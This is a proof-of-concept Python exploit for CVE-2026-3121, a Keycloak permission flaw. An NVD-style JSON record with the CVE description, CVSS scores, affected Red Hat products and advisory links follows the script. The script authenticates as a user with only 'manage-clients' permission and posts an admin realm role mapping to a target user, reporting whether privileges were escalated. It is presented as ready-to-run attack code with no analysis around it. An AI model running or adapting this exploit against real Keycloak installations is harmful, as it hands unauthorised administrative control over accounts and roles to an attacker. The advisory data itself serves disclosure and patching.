CVE-2026-3121

import requests # Target configuration TARGET_URL = "https://keycloak.example.com" REALM = "master" CLIENT_ID = "admin-cli" # Credentials for a user with 'manage-clients' permission only USERNAME = "limited_admin" PASSWORD = "password" # Step 1: Get Access Token auth_url = f"{TARGET_URL}/realms/{REALM}/protocol/openid-connect/token" auth_payload = { "client_id": CLIENT_ID, "username": USERNAME, "password": PASSWORD, "grant_type": "password" } session = requests.Session() auth_resp = session.post(auth_url, data=auth_payload) if auth_resp.status_code != 200: print("Authentication failed") exit(1) token = auth_resp.json().get("access_token") headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"} # Step 2: Exploit permission misconfiguration # Attempting to assign admin role (requires 'manage-permissions') # using 'manage-clients' permission due to CVE-2026-3121 target_user_id = "user-to-escalate-id" admin_role_representation = [ {"id": "admin-role-id", "name": "admin"} ] # Endpoint to add realm role mappings to user role_mapping_url = f"{TARGET_URL}/admin/realms/{REALM}/users/{target_user_id}/role-mappings/realm" print(f"Attempting to assign admin roles to user {target_user_id}...") exploit_resp = session.post(role_mapping_url, json=admin_role_representation, headers=headers) if exploit_resp.status_code == 204: print("[+] Exploit successful! Privileges escalated.") else: print(f"[-] Exploit failed. Status: {exploit_resp.status_code}")

{"cve": {"id": "CVE-2026-3121", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:17:06.213", "lastModified": "2026-04-02T14:16:31.713", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An administrator with `manage-clients` permission can exploit a misconfiguration where this permission is equivalent to `manage-permissions`. This allows the administrator to escalate privileges and gain control over roles, users, or other administrative functions within the realm. This privilege escalation can occur when admin permissions are enabled at the realm level."}, {"lang": "es", "value": "Se encontró un fallo en Keycloak. Un administrador con permiso 'manage-clients' puede explotar una mala configuración donde este permiso es equivalente a 'manage-permissions'. Esto permite al administrador escalar privilegios y obtener control sobre roles, usuarios u otras funciones administrativas dentro del ámbito. Esta escalada de privilegios puede ocurrir cuando los permisos de administrador están habilitados a nivel de ámbito."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:-:*:*:*", "matchCriteriaId": "E5C930CB-4EAD-497B-A44B-D880F2A1F85B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D8BC03A-4198-4488-946B-3F6B43962942"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A24CBFB-4900-47A5-88D2-A44C929603DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-3121", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442277", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}